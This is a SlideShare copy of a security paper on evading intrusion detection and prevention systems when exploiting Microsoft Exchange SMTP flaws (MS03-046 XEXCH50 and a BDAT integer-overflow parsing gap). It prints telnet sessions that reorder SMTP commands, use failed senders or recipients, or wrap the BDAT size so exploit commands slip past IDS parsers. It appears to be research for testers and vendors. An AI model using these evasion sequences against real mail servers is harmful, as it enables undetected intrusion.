SlideShare a Scribd company logo

Legiment Techniques of IDS/IPS Evasion

n|u - The Open Security Community
n|u - The Open Security Community

The document discusses legiment techniques for evading intrusion prevention and detection systems (IPS/IDS) when exploiting vulnerabilities. It defines legiment evasion as applying knowledge of an application protocol, exploit, and how IPS/IDS handles them to craft exploits that can bypass protections. Several techniques are presented, including altering command sequences, using invalid senders or recipients, and exploiting integer overflows, that aim to trick IPS/IDS into treating exploit traffic as legitimate. These legiment evasions are argued to be more effective than traditional evasion techniques at bypassing IPS/IDS without causing false positives.

Technology
1 of 8
Download to read offline
Legiment Techniques of IPS/IDS Evasion By- Ajit Hatti ajit.hatti.sec@gmail.com Contents : 1. Why learn Evasion Techniques? 2. What is Legiment Technique of IPS/IDS Evasion? 3. The Legiment evasions & the Outcomes. 4. Conclusion. 5. References. 1. Why learn Evasion Techniques Security is Important. As organizations increasing use the internet to take advantage of its global reach, new security controls relating to processes and technologies will need to be deployed and securely managed. The aim of every organization is to derive maximum benefits from its IT infrastructure. However, any IT technology, irrespective of the vendor credentials has known vulnerabilities with new ones being discovered regularly. Further, connecting the IT infrastructure to the Internet brings in a variety of new ones. So security is indispensable to all organizations for smooth & uninterrupted operation without compromising the confidentiality of information assets and resources. Security shouldn’t back fire. Security systems with false positives, affecting the legitimate traffic can cause more harm to business. Security measures should be properly targeted, and directly related to potential impacts, threats, and existing vulnerabilities. Failure to achieve this could result in inadequate security measures and excessive or unnecessary expenditure. An appropriate analysis of security systems in a stream of legitimate traffic can reduce false positives & promotes better targeting of security measures. Attack is the best defense. The need of the hour is proactive security management involving active analysis of the security systems and plug the known and new vulnerabilities before they can be used to cause serious damage. Bottom Line Its evident that security is a moving target. As more and more enterprise are deploying the security systems Like IPS/IDS, these security systems needs continuous evaluation with newer exploitation techniques. In this paper we look at some classical IPS/IDS evasion techniques and their limitations. Then we see how Legiment Techniques of Evasion proves effective compared to the classical once.
2. What is Legiment Technique of IPS/IDS Evasion. The term Legiment Evasion is derived from the 2 terms below : Legement : Ledgment Ledg"ment (-ment), n. (Arch.) (a) A string-course or horizontal suit of moldings, such as the base moldings of a building. --Oxf. Gloss. (b) The development of the surface of a body on a plane, so that the dimensions of the different sides may be easily ascertained. --Gwilt Legilimency : is the magical skill of extracting feelings and memories from another person's mind — a form of magical "mind-reading" -- J.K. Rowling. The Legiment evasion techniques are the one which uses the understanding of the application protocols, the exploit, and the way IDS/IPS handles them. Any existing exploit can be crafted in a way to evade the IPS/IDS if we know about their capabilities or incapabilities. So this technique mainly focuses on the data going over application layer and not below that and hence needs knowledge of the exploit and the server being exploited. In other words - we are applying legilimency to the IPS/IDS boxes or Exploit Legementing, based on IPS/IDS behavior. 3. The Legiment Evasions and The Outcomes I will be explaining the Legiment evasion techniques using2 cases. First - MS03-046, a vulnerability present in Exchange with causes a buffer over flow. A brief intro to MS03-046. Second the flaw in implementation of BDAT command in Exchange. Case 1: MS03-046 XEXCH50 is an exchange command, which accepts 2 parameters, first being the message size. Exchange allocates a buffer of size mentioned in the first parameters and is not handled properly. For a negative value or a value large enough (>231) , Exchange results in Buffer overflow. A typical exploit will send the exchange commands as follows: XEXCH50 -2 1 . Now before we plan to attack and IPS/IDS with MS03-046 exploit, we can do simple test to detect the presence of and IPS/IDS using simple techniques. Send the following command sequence on a mail session. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at
Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] XEXCH50 2 2 354 Send binary data The vulnerable or un-patched server will respond with “354 Send binary data” message where as the patched server will ask for NTLM authentication first. Depending on the response we got from above command sequence, we know whether the target server is vulnerable, we can send the exploit straight away. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] XEXCH50 -1 2 If our session gets reset, with out an authentication request from the mail server, then it proves the presence of an IPS system in between. Now once we know that we have an IPS/IDS in between, we can choose our evasion techniques. Classical IPS/IDS Evasion techniques 1. TCP level Fragmentation In this technique we split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. Now we can send the exploits in 2 ways a. Send the fragments with a pause in between hoping that the IDS will time out before the target computer does. Example 1: 1.1 XEX ---> 1.2 CH5 ---> 451 Timeout waiting for client input Connection closed by foreign host. 1.3 TCP/SYN 1.4 0 -1 1.5 2rn Here we have broken “XEXCH50 -1 2rn” over 5 TCP packets. After we send the first to packet we wait for time out, we assume that IDS/IPS in between will time out before the target Exchange Server. Form the 3rd packet onwards it’s a new session and a positive traffic for IPS/IDS, but not for Exchange server.
b. Send the above packets out of sequence. As the TCP packets can reach the destination, out of order, and target server reassembles them. But chances are there that IPS/IDS system will not hold the packets for long and pass them on before they reassemble and evaluate it for an exploit in traffic resulting in a bypass. Limitations of Fragmented Evasion: 1. If the IPS/IDS are tuned to keep up a TCP session for the same duration as The exchange does then the fragments can be handled in one session 2. If the IPS/IDS assembles the packet (virtual streaming), then the exploits can be easily intercepted. Legiment Evasion techniques to bypass IDS/IPS 1. The Trick In Exchange, any thing that follows after DATA command is treated as part of the message body & it is not decoded as an SMTP command. With a specially crafted mail, we can easily put IDS maintaining states to decode DATA, even when the protected server is expecting SMTP commands but not DATA. At this moment, if we send the vulnerable SMTP commands to the protected server, our IDS are easily bypassed & server is exploited. IDS/IPS behaviour Analysis Consider the following sesson from a telnet client to a and Exchange Server. $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : varun 250 2.1.5 varun@TapiServer.... DATA 354 Start mail input; end with <CRLF>.<CRLF> FROM : Ajit TO : Varun Subject : MS03-046 Exploit.
XEXCH50 -2 1 [Shell Code] If the IDS system raises the alarm for the above traffic, or IPS blocks the above session then it’s a false positive. Because in above session I’m trying to send a mail with the information about the MS03-046 exploit. Any IDS/IPS system triggering for this mail means hampering a false positive which is not acceptable. Now lets assume our IDS wont trigger for the above traffic as it decodes the application traffic and maintain a state machine to differentiate the positive traffic from a real exploit. Then consider the illustrations below. I. Altering the Command Sequence Consider following scenario: $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK * DATA 503 5.5.2 Need RCPT command. RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 In above commands sequence, DATA is sent before RCPT TO request. Hence the DATA command fails & whatever follows DATA, our IDS assumes it as a message body and doesn’t look for the vulnerable Exchange Commands in it. Hence the IDS can be easily bypassed. II. Invalid Sender $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : invalid_user@localhost 550 5.7.1 invalid_user@localhost... Relaying denied. IP name lookup failed [192.168.86.1]
RCPT TO : ajit 503 5.5.2 Need MAIL command. DATA 503 5.5.2 Need MAIL command. MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 In above transaction, sender is an user who has no rights to relay from the given SMTP Server & so the MAIL FROM command fails. If the IDS keeps a state check on DATA only after MAIL FROM & RCPT TO commands, even then it can’t stop the above exploit. Because, IDS doesn’t know the MAIL FROM has failed. The IDS will check MAIL FROM & RCPT TO has been send and will assume that DATA coming after this is valid data. The MAIL FROM & RCPT TO after the DATA command will be decoded as HEADERS, and X-EXCH50 as some extended MIME (i.e we will ignore it), But for Server its an exploit. III.Non-Existant Reciepent $ telnet 192.168.86.5 25 Trying 192.168.86.5... Connected to 192.168.86.5. Escape character is '^]'. 220 TapiServer? Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 5 Oct 2006 16:30:43 -0700 HELO 250 TapiServer Hello [192.168.86.1] MAIL FROM : ajit 250 2.1.0 ajit@TapiServer....Sender OK RCPT TO : non_existant_user@localhost 550 5.7.1 non_existant_user@localhost... Relaying denied. IP name lookup failed [192.168.86.1] DATA 503 5.5.2 Need RCPT command. RCPT TO : ajit 250 2.1.5 ajit@TapiServer //--- Now I can send any Exchange Exploitable command //----and bypass the decoders XEXCH50 -2 1 Above transaction is similar to that of "Invalid Sender". Difference is, this time we are sending mail to a user which doesn’t exist on the server or to which it can’t deliver. Hence the RCPT TO fails. Case 2. Flaw in BDAT There is a flow in the way windows handles the integer overflow. According to RFC-1830, BDAT
command accepts <SIZE> parameter in Decimal Number. Exchange accepts the BDAT <SIZE> argument in a signed integer. When we give a <SIZE> string large enough to overflow a signed integer, Exchange spins the number to-and-from between negative and positive value. For instance: BDAT 4294967296 LASTrn Here the size “4294967297” Exchange will cast the effective value of BDAT chunk size as “1”. (for 4294967296 the effective value is 0 and for 4294967298 its 2 and so on) So for the above command any IPS/IDS will be expecting a chunk of size”4294967297”. And in the subsequent “4294967297” bytes it will not try to decode for any vulnerable command, but for Exchange, the chunk size is “1”, and whatever comes after that is a new command. Now here you can add the exploits for vulnerabilities like MS05-021, MS03-046. In this way we can create a simple legiment exploit.bypass 4. Conclusion : More Effective: • These Legiment evasions i.e. the specially crafted mails can bypass all sorts of IPS/IDS (signature based or state based). • If any signature based IPS/IDS can intercept these evasions (without looking to the Server's response), then its bound to give False Positive for any legitimate mail which lists or describes the vulnerable SMTP commands. Tuff to Tackle: • Legiment Evasions are more application specific where as classical evasion techniques are generic and targeted at loopholes in TCP/IP implementations which are easy to patch with the patches available for the host OS on which they are implemented. • IDS/IPS vendors must do Full-Duplex, session state decoding to stop Legiment Evasions. The signature based IPS/IDS will result in Bypass or False Positive. Ease of creation : • The TCP/IP level programming is not required • Changes can be easily incorporated in the existing Exploit frameworks Benefits : • The hackers, PenTesters & the testers of IPS/IDS systems are equally benefited with these methods. Legiment Techniques also encourages us to study the application implementations in bring their flaws in light.
References : http://www.microsoft.com/technet/security/Bulletin/MS03-046.mspx http://support.microsoft.com/kb/812455 http://en.wikipedia.org/wiki/Intrusion_detection_system_evasion_techniques

Recommended

Enhancing the impregnability of linux servers
Enhancing the impregnability of linux serversEnhancing the impregnability of linux servers
Enhancing the impregnability of linux serversIJNSA Journal
 
La seguridad sí importa: Windows Live & IE9
La seguridad sí importa: Windows Live & IE9La seguridad sí importa: Windows Live & IE9
La seguridad sí importa: Windows Live & IE9Eventos Creativos
 
De-Authentication attack on wireless network 802.11i using Kali Linux
De-Authentication attack on wireless network 802.11i using Kali LinuxDe-Authentication attack on wireless network 802.11i using Kali Linux
De-Authentication attack on wireless network 802.11i using Kali LinuxIRJET Journal
 
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...Monitoring Privileged User Actions for Security and Compliance with SureLog: ...
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...Ertugrul Akbas
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)Vishal Kumar
 
Protection of server from syn flood attack
Protection of server from syn flood attackProtection of server from syn flood attack
Protection of server from syn flood attackIAEME Publication
 
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wp
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wpUs 13-opi-evading-deep-inspection-for-fun-and-shell-wp
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wpOlli-Pekka Niemi
 
Wireless Disassociation and Deauthentication Attacks
Wireless Disassociation and Deauthentication AttacksWireless Disassociation and Deauthentication Attacks
Wireless Disassociation and Deauthentication AttacksDavid Sweigert
 

Recommended

Enhancing the impregnability of linux servers
Enhancing the impregnability of linux serversEnhancing the impregnability of linux servers
Enhancing the impregnability of linux serversIJNSA Journal
 
La seguridad sí importa: Windows Live & IE9
La seguridad sí importa: Windows Live & IE9La seguridad sí importa: Windows Live & IE9
La seguridad sí importa: Windows Live & IE9Eventos Creativos
 
De-Authentication attack on wireless network 802.11i using Kali Linux
De-Authentication attack on wireless network 802.11i using Kali LinuxDe-Authentication attack on wireless network 802.11i using Kali Linux
De-Authentication attack on wireless network 802.11i using Kali LinuxIRJET Journal
 
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...Monitoring Privileged User Actions for Security and Compliance with SureLog: ...
Monitoring Privileged User Actions for Security and Compliance with SureLog: ...Ertugrul Akbas
 
The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)Vishal Kumar
 
Protection of server from syn flood attack
Protection of server from syn flood attackProtection of server from syn flood attack
Protection of server from syn flood attackIAEME Publication
 
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wp
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wpUs 13-opi-evading-deep-inspection-for-fun-and-shell-wp
Us 13-opi-evading-deep-inspection-for-fun-and-shell-wpOlli-Pekka Niemi
 
Wireless Disassociation and Deauthentication Attacks
Wireless Disassociation and Deauthentication AttacksWireless Disassociation and Deauthentication Attacks
Wireless Disassociation and Deauthentication AttacksDavid Sweigert
 
Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
business
businessbusiness
businessGajendra Saini
 
OpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense ServicesOpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense ServicesEswar Publications
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question CollectionManish Luintel
 
Computer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacksComputer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacksTesfahunegn Minwuyelet
 
Nii sample pt_report
Nii sample pt_reportNii sample pt_report
Nii sample pt_reportChandan Bagai, GWAPT, CEHv8, CCNA
 
An Effective Spam Protection System
An Effective Spam Protection SystemAn Effective Spam Protection System
An Effective Spam Protection SystemApollo_n
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...IDES Editor
 
Method of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to systemMethod of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to systemTal Lavian Ph.D.
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerCEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerDavid Sweigert
 
Intrusion Detection System
Intrusion Detection SystemIntrusion Detection System
Intrusion Detection SystemPreshan Pradeepa
 
Using IPS for Web Protection
Using IPS for Web ProtectionUsing IPS for Web Protection
Using IPS for Web ProtectionConferencias FIST
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection systemAAKASH S
 
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016Dmitrii Ignatov
 
Why ips slide share
Why ips slide shareWhy ips slide share
Why ips slide shareTravis Abrams
 
Its time to Fix the Firewall
Its time to Fix the Firewall Its time to Fix the Firewall
Its time to Fix the Firewall ITogether
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniquesguest66dc5f
 
IDS / IPS Survey
IDS / IPS SurveyIDS / IPS Survey
IDS / IPS SurveyDeris Stiawan
 
Ips and ids
Ips and idsIps and ids
Ips and idspadolph25
 
Ids ips detection
Ids ips detectionIds ips detection
Ids ips detectionTensor
 
Improve threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usmImprove threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usmAlienVault
 

More Related Content

What's hot

Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetDavid Sweigert
 
OpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense ServicesOpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense ServicesEswar Publications
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question CollectionManish Luintel
 
Computer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacksComputer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacksTesfahunegn Minwuyelet
 
An Effective Spam Protection System
An Effective Spam Protection SystemAn Effective Spam Protection System
An Effective Spam Protection SystemApollo_n
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...IDES Editor
 
Method of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to systemMethod of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to systemTal Lavian Ph.D.
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerCEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerDavid Sweigert
 

What's hot (11)

Certified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheetCertified Ethical Hacker quick test prep cheat sheet
Certified Ethical Hacker quick test prep cheat sheet
 
business
businessbusiness
business
 
OpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense ServicesOpenFlow Security Threat Detection and Defense Services
OpenFlow Security Threat Detection and Defense Services
 
CEHv7 Question Collection
CEHv7 Question CollectionCEHv7 Question Collection
CEHv7 Question Collection
 
Computer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacksComputer security Description about SQL-Injection and SYN attacks
Computer security Description about SQL-Injection and SYN attacks
 
Nii sample pt_report
Nii sample pt_reportNii sample pt_report
Nii sample pt_report
 
An Effective Spam Protection System
An Effective Spam Protection SystemAn Effective Spam Protection System
An Effective Spam Protection System
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
Attack Robustness and Security Enhancement with Improved Wired Equivalent Pro...
 
Method of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to systemMethod of and apparatus for providing multi-level security access to system
Method of and apparatus for providing multi-level security access to system
 
CEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical HackerCEH v9 cheat sheet notes Certified Ethical Hacker
CEH v9 cheat sheet notes Certified Ethical Hacker
 

Viewers also liked

Intrusion Detection System
Intrusion Detection SystemIntrusion Detection System
Intrusion Detection SystemPreshan Pradeepa
 
Using IPS for Web Protection
Using IPS for Web ProtectionUsing IPS for Web Protection
Using IPS for Web ProtectionConferencias FIST
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection systemAAKASH S
 
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016Dmitrii Ignatov
 
Its time to Fix the Firewall
Its time to Fix the Firewall Its time to Fix the Firewall
Its time to Fix the Firewall ITogether
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniquesguest66dc5f
 
Ids ips detection
Ids ips detectionIds ips detection
Ids ips detectionTensor
 
Improve threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usmImprove threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usmAlienVault
 
Introduction To NIDS
Introduction To NIDSIntroduction To NIDS
Introduction To NIDSMichael Boman
 
Intrusion Detection System (IDS)
Intrusion Detection System (IDS)Intrusion Detection System (IDS)
Intrusion Detection System (IDS)HCL Technologies
 
IDS, IPS, IDPS
IDS, IPS, IDPSIDS, IPS, IDPS
IDS, IPS, IDPSMinhaz A V
 
Aws security with HIDS, OSSEC
Aws security with HIDS, OSSECAws security with HIDS, OSSEC
Aws security with HIDS, OSSECMayank Gaikwad
 
Introduction To Intrusion Detection Systems
Introduction To Intrusion Detection SystemsIntroduction To Intrusion Detection Systems
Introduction To Intrusion Detection SystemsPaul Green
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection systemAkhil Kumar
 

Viewers also liked (20)

Intrusion Detection System
Intrusion Detection SystemIntrusion Detection System
Intrusion Detection System
 
Using IPS for Web Protection
Using IPS for Web ProtectionUsing IPS for Web Protection
Using IPS for Web Protection
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection system
 
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
NIPS 2016, Tensor-Learn@NIPS, and IEEE ICDM 2016
 
Why ips slide share
Why ips slide shareWhy ips slide share
Why ips slide share
 
Its time to Fix the Firewall
Its time to Fix the Firewall Its time to Fix the Firewall
Its time to Fix the Firewall
 
Ajit-Legiment_Techniques
Ajit-Legiment_TechniquesAjit-Legiment_Techniques
Ajit-Legiment_Techniques
 
IDS / IPS Survey
IDS / IPS SurveyIDS / IPS Survey
IDS / IPS Survey
 
Ips and ids
Ips and idsIps and ids
Ips and ids
 
Ids ips detection
Ids ips detectionIds ips detection
Ids ips detection
 
Improve threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usmImprove threat detection with hids and alien vault usm
Improve threat detection with hids and alien vault usm
 
NIDS ppt
NIDS pptNIDS ppt
NIDS ppt
 
Introduction To NIDS
Introduction To NIDSIntroduction To NIDS
Introduction To NIDS
 
Intrusion Detection System (IDS)
Intrusion Detection System (IDS)Intrusion Detection System (IDS)
Intrusion Detection System (IDS)
 
IDS, IPS, IDPS
IDS, IPS, IDPSIDS, IPS, IDPS
IDS, IPS, IDPS
 
IDS n IPS
IDS n IPSIDS n IPS
IDS n IPS
 
Aws security with HIDS, OSSEC
Aws security with HIDS, OSSECAws security with HIDS, OSSEC
Aws security with HIDS, OSSEC
 
Introduction To Intrusion Detection Systems
Introduction To Intrusion Detection SystemsIntroduction To Intrusion Detection Systems
Introduction To Intrusion Detection Systems
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Intrusion detection system
Intrusion detection systemIntrusion detection system
Intrusion detection system
 

Similar to Legiment Techniques of IDS/IPS Evasion

Ajit - Legiment Techniques - ClubHack2007
Ajit - Legiment Techniques - ClubHack2007Ajit - Legiment Techniques - ClubHack2007
Ajit - Legiment Techniques - ClubHack2007ClubHack
 
cloud computing final year project
cloud computing final year projectcloud computing final year project
cloud computing final year projectAmeya Vashishth
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical HackingSripati Mahapatra
 
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...IRJET Journal
 
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)Industrial Control System Network Cyber Security Monitoring Solution (SCAB)
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)Enrique Martin
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKS
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKSEFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKS
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKScscpconf
 
Intranet Messaging Project Report -phpapp02
Intranet Messaging Project Report -phpapp02Intranet Messaging Project Report -phpapp02
Intranet Messaging Project Report -phpapp02dvicky12
 
1. Security and vulnerability assessment analysis tool - Microsoft.docx
1. Security and vulnerability assessment analysis tool - Microsoft.docx1. Security and vulnerability assessment analysis tool - Microsoft.docx
1. Security and vulnerability assessment analysis tool - Microsoft.docxpaynetawnya
 
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacksKipp Berdiansky
 
Securing Switch Access
Securing Switch Access Securing Switch Access
Securing Switch Access Netwax Lab
 
Denial of-service-Attack
Denial of-service-AttackDenial of-service-Attack
Denial of-service-AttackYatindra shashi
 
[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...[White paper] detecting problems in industrial networks though continuous mon...
[White paper] detecting problems in industrial networks though continuous mon...TI Safe
 
Pass4sure 640-554 Cisco IOS Network Security
Pass4sure 640-554 Cisco IOS Network SecurityPass4sure 640-554 Cisco IOS Network Security
Pass4sure 640-554 Cisco IOS Network SecurityHecrocro
 
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...
PREDICTIVE DETECTION OF KNOWN SECURITY CRITICALITIES IN CYBER PHYSICAL SYSTEM...cscpconf
 

Similar to Legiment Techniques of IDS/IPS Evasion (20)

Ajit - Legiment Techniques - ClubHack2007
Ajit - Legiment Techniques - ClubHack2007Ajit - Legiment Techniques - ClubHack2007
Ajit - Legiment Techniques - ClubHack2007
 
cloud computing final year project
cloud computing final year projectcloud computing final year project
cloud computing final year project
 
Lab08Email
Lab08EmailLab08Email
Lab08Email
 
Wp ci securing_layer2
Wp ci securing_layer2Wp ci securing_layer2
Wp ci securing_layer2
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...
IRJET- Securing the Transfer of Confidential Data in Fiscal Devices using Blo...
 
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)Industrial Control System Network Cyber Security Monitoring Solution (SCAB)
Industrial Control System Network Cyber Security Monitoring Solution (SCAB)
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Network security
Network securityNetwork security
Network security
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKS
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKSEFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKS
EFFICIENT DEFENSE SYSTEM FOR IP SPOOFING IN NETWORKS
 
Intranet Messaging Project Report -phpapp02
Intranet Messaging Project Report -phpapp02Intranet Messaging Project Report -phpapp02
Intranet Messaging Project Report -phpapp02
 
1. Security and vulnerability assessment analysis tool - Microsoft.docx
